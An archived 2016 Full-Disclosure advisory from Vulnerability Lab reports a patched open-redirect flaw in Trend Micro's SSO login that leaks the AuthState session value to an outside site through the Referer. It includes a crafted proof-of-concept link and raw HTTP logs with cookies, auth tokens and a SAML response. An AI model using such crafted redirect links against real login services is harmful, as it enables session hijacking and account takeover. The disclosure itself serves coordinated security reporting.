lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <56FD126D.1000907@vulnerability-lab.com>
Date: Thu, 31 Mar 2016 14:05:01 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Trend Micro (SSO) - (Backend) SSO Redirect & Session
	Vulnerability


Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1694

Trand Micro ID: 1-1-1035080936


Release Date:
=============
2016-03-31


Vulnerability Laboratory ID (VL-ID):
====================================
1694


Common Vulnerability Scoring System:
====================================
6.5


Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
business.
Its cloud and virtualization security products provide cloud security
for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva
Chen
serves as Trend Micro’s chief executive officer, a position she has held
since 2005 when she succeeded founding CEO Steve Chang. Chang serves as
chairman of Trend Micro.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a redirect
and session web vulnerability in the official trend micro sso online
service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri
- Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A redirect issue with information leaking has been discovered in the
official Trendmirco online-service web-application.
The vulnerability allows an attacker to send a crafted link to the
victim. The execution (which requires a login) will disclose leaking
information to the attackers webserver.
In this case the AuthState value is beeing leaked.

The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked
by the victim the website requests him to login. After the login the
victim is beeing quitly redirected to the webserver. The previous
requests includes the new AuthState in
the GET request which includes the users session. The AuthState is
beeing exposed in the Referer afterwards. The attacker can use the
AuthState value to overtake the account session.

The vulnerability is located in the SSOService.php. A remote attacker is
able to craft a link by modifing the RelayState parameter to his
webserver. After the link is clicked by
the victim the website requests him to login. After the login the victim
is beeing quitly redirected to the webserver. The previous requests
includes the new AuthState in the GET
request which includes the users session. The AuthState is beeing
exposed in the Referer afterwards. The attacker can use the AuthState
value to overtake the account session.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without
privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
2. The victim will redirect to yahoo
3. The AuthState code will cached on the referer of the attackers
website  ... like on yahoo
4. Successful reproduce of the vulnerability!


--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content
Size[-1] Mime Type[text/html]
   Request Headers:
      Host[sso1.trendmicro.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
     
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
      Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070;
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]
      Connection[keep-alive]
   Response Headers:
      Date[Fri, 29 Jan 2016 12:20:22 GMT]
      Server[Apache/2.2.15 (CentOS)]
      Strict-Transport-Security[max-age=63072000; includeSubdomains;
preload]
      X-Frame-Options[SAMEORIGIN]
      x-content-type-options[nosniff]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]



POST
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content
Size[368] Mime Type[text/html]
   Request Headers:
      Host[account.trendmicro.com]
      User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
     
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate, br]
     
Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]
      Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]
      Connection[keep-alive]
   Post Data:
SAMLResponse[PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iIElEPSJfZGZkMjU2NGNkNjI1NTYzOTBjNDI1ZGJiOTA4YWY1MDNiOGQ1ZmUwMmJiIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiIERlc3RpbmF0aW9uPSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIj48c2FtbDpJc3N1ZXI%2BaHR0cHM6Ly9zc28xLnRyZW5kbWljcm8uY29tL3NpZ25pbi9zYW1sMi9pZHAvbWV0YWRhdGEucGhwPC9zYW1sOklzc3Vlcj48ZHM6U2lnbmF0dXJlIHhtbG5zOmRzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjIj4KICA8ZHM6U2lnbmVkSW5mbz48ZHM6Q2Fub25pY2FsaXphdGlvbk1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPgogICAgPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPgogIDxkczpSZWZlcmVuY2UgVVJJPSIjX2RmZDI1NjRjZDYyNTU2MzkwYzQyNWRiYjkwOGFmNTAzYjhkNWZlMDJiYiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3NoYTEiLz48ZHM6RGlnZXN0VmFsdWU%2BSDNlcVhEaWVOWG5YcnBRaUZ4cmxYZ25tbVJnPTwvZHM6RGlnZXN0VmFsdWU%2BPC9kczpSZWZlcmVuY2U%2BPC9kczpTaWduZWRJbmZvPjxkczpTaWduYXR1cmVWYWx1ZT5tTGVPZkpDZFRkQzRPTXp4dVk2NnEvcE91UG5LYUxTS2tBY1Y4RFoxM25iNklSSEFTV3hVL3dlZE96OU9WaXN6Y2lTN0h6dlpSQ2djQXo3amgwdTlpazlmam4yNE5PR09ObjZySG9ra0xQaXY4N2FpUWMvSkN6emd1M1pmQzcrV3pXOXY4QW5DZjIxWmZ6RDArWDZyb3lvLzkrQkVXVmtJVmkzNklEWVdWOFJSeXVqTVFQUFQxZ3NXYTVXUzQ3aE5WUmdZcyt3YmlzbklGMG81TWovaWlUdjdobUZaQ2VDTWljMm03RENQM2lnQlR3R0hrZnpsUC9FdldGcXJldnV3clZkVS9VS3FDRjltcXNjeG5INWE5YkNxZmU2ekIzK2wzdHZkSDgwd0Z3Tkg0aldvSWRXY1hPOTZEbUQ2MEs0QUQ1YVpIcW45Uk9YR1JwaUNyanhRL0E9PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BCjxkczpLZXlJbmZvPjxkczpYNTA5RGF0YT48ZHM6WDUwOUNlcnRpZmljYXRlPk1JSURGRENDQWZ5Z0F3SUJBZ0lKQUtoSmdOUDAvZzZhTUEwR0NTcUdTSWIzRFFFQkJRVUFNQkF4RGpBTUJnTlZCQU1UQlZSbGNuSmhNQjRYRFRFeE1ERXdNekF5TURFME4xb1hEVEl3TVRJek1UQXlNREUwTjFvd0VERU9NQXdHQTFVRUF4TUZWR1Z5Y21Fd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURad2FJSmVwdHJJaVV4WjVXbDVMVVEvS0VpbEtPRmRZTWdTSjg0RkxDRTNXYlk2U1NWcURqWmYvcEM1dU4waFg4R0xPL3Z2UExVaGFHa1ZpdXhzSVRYM1VOUThLT1VlVW1lMHBVb1lFSWxFbjdJRmZuR29SQlV1eDJaTkVXVWRXelV3Z3RrR2dqRzhnTnROTGlnT3ZJN1ZPTndPZEM3bzZ0TUlHWm12azA1NFZLN2ZKMTkyTTJYNnNmay9YQnBicE5NWk5hQWRrR2dISlJqNk9UR2I5QkFPbzR3M2E3RTd0eVRveEd2czFpQWtQalg1SXE2NGltTFdnOW1OWjMvNkpZOHVhMkVpcXZhU0lsSHFZZzNJNjA2OEdCYlhZeDJtZmNLdlNFbTBwdDFoTm0zOExGdVVJNC9TQm1vVDFKeXRLcTIvQnNLc2o3RnZDWkRYck5Xb1NRcEFnTUJBQUdqY1RCdk1CMEdBMVVkRGdRV0JCUzF3OU1HSWRxMmQ2MmlVSkJFKzdLem5xNTFOVEJBQmdOVkhTTUVPVEEzZ0JTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5hRVVwQkl3RURFT01Bd0dBMVVFQXhNRlZHVnljbUdDQ1FDb1NZRFQ5UDRPbWpBTUJnTlZIUk1FQlRBREFRSC9NQTBHQ1NxR1NJYjNEUUVCQlFVQUE0SUJBUUFQbDFtb0hUTGg1M3BkOGdhVU9uY1FJUFB6dFBvR1NiVURpclA2OFk5SVhGYmwwd3I3NnlFK0ROYys1cEExK0xZNDkvdjBPZ3BuTXY3UGlPTFhMQzNhdnpKVFhkSW9GS2Z2Mno3T24zaEp1d3EyUHpacHF4RXVzVEdHSkRHaW9BSnJSOU1PSzQ5Q1hVYmdaMTVvY0ZkUXVpays5ZDJXaHJqQW1ueEtLbVVJZWxOOEpWVjFTQWhwOUpjN2NiZTJJZVl0cFViSyt0QnVROFFvT01tTUtxTEh3UE5ad2RYT0o1NWFsNHBLT3VzVTJSOXpyZnREWXlFUU1KOHVIZkdCSzZtYnoxWEFDOG9QUW5FQ2VkS0I4a3I0eG9md09aWjRCSmNZZDhNQ3ptNUNXRmtBRHljQTRrNlVvd1pnODY0dWFEbk1lZ2VxN1Vwd3NlZks3RzFJVzdpSzwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbHA6U3RhdHVzPjxzYW1sOkFzc2VydGlvbiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIElEPSJfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiPjxzYW1sOklzc3Vlcj5odHRwczovL3NzbzEudHJlbmRtaWNyby5jb20vc2lnbmluL3NhbWwyL2lkcC9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BCiAgICA8ZHM6U2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3JzYS1zaGExIi8%2BCiAgPGRzOlJlZmVyZW5jZSBVUkk9IiNfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIj48ZHM6VHJhbnNmb3Jtcz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI2VudmVsb3BlZC1zaWduYXR1cmUiLz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPC9kczpUcmFuc2Zvcm1zPjxkczpEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjc2hhMSIvPjxkczpEaWdlc3RWYWx1ZT5sbk1xNmtkUHdCdTJ3WE04cjRZeEdqNGRMUFk9PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGRzOlNpZ25hdHVyZVZhbHVlPmpZbkxvblhIdEdCOGlxODRQZFpXOWpFdzJndWRxM0tEQ3FyMGtEQjl4TW4xUXE3TG1FQ3B6cUFRei93ZFFVSUx6cHlRNFgvQWREME5nTFJudk1nK0dEWmNjRWZvUWhTVC9VSithdmJHVFAvMTFrM2Mvczl5c0ZwcjlKSG5LOU9uMkUxUVlBeXdEMnhIWHE4NnZjNEU1YjVOYzM4MFozeUpkYi8yNmwxQllrWm9wV3ltMGY4L0EzUmJENlJNdkFBK1VPajUwK0FTcnMwa0N3SEdJSllCS2hwM3BwQXhPMWg3bkNqVGUremx2elpOV3RFTDNtOFpRQjhSckhQVU9CR2FZdjZTQTBHNDBRNkFyeE4yR3BHVjJENzN5MWprQ2ZSK0Q3d0RqUTMrRlBPekozNGo0L2haUi9seWJqeFRqTkFNUVpDbWk5UFM2dzNXcTJDL3EydHo3Zz09PC9kczpTaWduYXR1cmVWYWx1ZT4KPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJREZEQ0NBZnlnQXdJQkFnSUpBS2hKZ05QMC9nNmFNQTBHQ1NxR1NJYjNEUUVCQlFVQU1CQXhEakFNQmdOVkJBTVRCVlJsY25KaE1CNFhEVEV4TURFd016QXlNREUwTjFvWERUSXdNVEl6TVRBeU1ERTBOMW93RURFT01Bd0dBMVVFQXhNRlZHVnljbUV3Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLQW9JQkFRRFp3YUlKZXB0cklpVXhaNVdsNUxVUS9LRWlsS09GZFlNZ1NKODRGTENFM1diWTZTU1ZxRGpaZi9wQzV1TjBoWDhHTE8vdnZQTFVoYUdrVml1eHNJVFgzVU5ROEtPVWVVbWUwcFVvWUVJbEVuN0lGZm5Hb1JCVXV4MlpORVdVZFd6VXdndGtHZ2pHOGdOdE5MaWdPdkk3Vk9Od09kQzdvNnRNSUdabXZrMDU0Vks3ZkoxOTJNMlg2c2ZrL1hCcGJwTk1aTmFBZGtHZ0hKUmo2T1RHYjlCQU9vNHczYTdFN3R5VG94R3ZzMWlBa1BqWDVJcTY0aW1MV2c5bU5aMy82Slk4dWEyRWlxdmFTSWxIcVlnM0k2MDY4R0JiWFl4Mm1mY0t2U0VtMHB0MWhObTM4TEZ1VUk0L1NCbW9UMUp5dEtxMi9Cc0tzajdGdkNaRFhyTldvU1FwQWdNQkFBR2pjVEJ2TUIwR0ExVWREZ1FXQkJTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5UQkFCZ05WSFNNRU9UQTNnQlMxdzlNR0lkcTJkNjJpVUpCRSs3S3pucTUxTmFFVXBCSXdFREVPTUF3R0ExVUVBeE1GVkdWeWNtR0NDUUNvU1lEVDlQNE9takFNQmdOVkhSTUVCVEFEQVFIL01BMEdDU3FHU0liM0RRRUJCUVVBQTRJQkFRQVBsMW1vSFRMaDUzcGQ4Z2FVT25jUUlQUHp0UG9HU2JVRGlyUDY4WTlJWEZibDB3cjc2eUUrRE5jKzVwQTErTFk0OS92ME9ncG5NdjdQaU9MWExDM2F2ekpUWGRJb0ZLZnYyejdPbjNoSnV3cTJQelpwcXhFdXNUR0dKREdpb0FKclI5TU9LNDlDWFViZ1oxNW9jRmRRdWlrKzlkMldocmpBbW54S0ttVUllbE44SlZWMVNBaHA5SmM3Y2JlMkllWXRwVWJLK3RCdVE4UW9PTW1NS3FMSHdQTlp3ZFhPSjU1YWw0cEtPdXNVMlI5enJmdERZeUVRTUo4dUhmR0JLNm1iejFYQUM4b1BRbkVDZWRLQjhrcjR4b2Z3T1paNEJKY1lkOE1Dem01Q1dGa0FEeWNBNGs2VW93Wmc4NjR1YURuTWVnZXE3VXB3c2VmSzdHMUlXN2lLPC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kczpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPHNhbWw6U3ViamVjdD48c2FtbDpOYW1lSUQgU1BOYW1lUXVhbGlmaWVyPSJteWFjY291bnQtc3AiIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6dHJhbnNpZW50Ij5fNWVkYmFkMzJmYzYyNWM4Y2VjZWM0MjRmZGQzYmE5ZGY0NmM5ZWY4OWVjPC9zYW1sOk5hbWVJRD48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uIE1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmNtOmJlYXJlciI%2BPHNhbWw6U3ViamVjdENvbmZpcm1hdGlvbkRhdGEgTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDEyOjI1OjIzWiIgUmVjaXBpZW50PSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIi8%2BPC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24%2BPC9zYW1sOlN1YmplY3Q%2BPHNhbWw6Q29uZGl0aW9ucyBOb3RCZWZvcmU9IjIwMTYtMDEtMjlUMTI6MTk6NTNaIiBOb3RPbk9yQWZ0ZXI9IjIwMTYtMDEtMjlUMTI6MjU6MjNaIj48c2FtbDpBdWRpZW5jZVJlc3RyaWN0aW9uPjxzYW1sOkF1ZGllbmNlPm15YWNjb3VudC1zcDwvc2FtbDpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbj48L3NhbWw6Q29uZGl0aW9ucz48c2FtbDpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTYtMDEtMjlUMTE6NTE6MzlaIiBTZXNzaW9uTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDIwOjIwOjIzWiIgU2Vzc2lvbkluZGV4PSJfNzRhNjY1Y2I5NmE2ZDY0ZTQyZmE1YjhkNTAyYmRkYTEwNzZkMTQyMDhmIj48c2FtbDpBdXRobkNvbnRleHQ%2BPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmQ8L3NhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BPC9zYW1sOkF1dGhuQ29udGV4dD48L3NhbWw6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWw6QXR0cmlidXRlU3RhdGVtZW50PjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj5zYW1pckBldm9sdXRpb24tc2VjLmNvbTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudE5hbWUiIE5hbWVGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphdHRybmFtZS1mb3JtYXQ6YmFzaWMiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlIHhzaTp0eXBlPSJ4czpzdHJpbmciPnNhbWlyQGV2b2x1dGlvbi1zZWMuY29tPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBdHRyaWJ1dGU%2BPHNhbWw6QXR0cmlidXRlIE5hbWU9IkNvbnN1bWVyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj41MDE5NzM3Mzwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ%2BPC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D]
      RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
   Response Headers:
      Date[Fri, 29 Jan 2016 12:20:24 GMT]
      Server[Apache]
     
Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d;
path=/; httponly]
      Location[https://yahoo.com/my_account/]
      Pragma[no-cache]
      Cache-Control[no-cache, must-revalidate]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      X-Frame-Options[SAMEORIGIN]
      Content-Length[368]
      Connection[close]
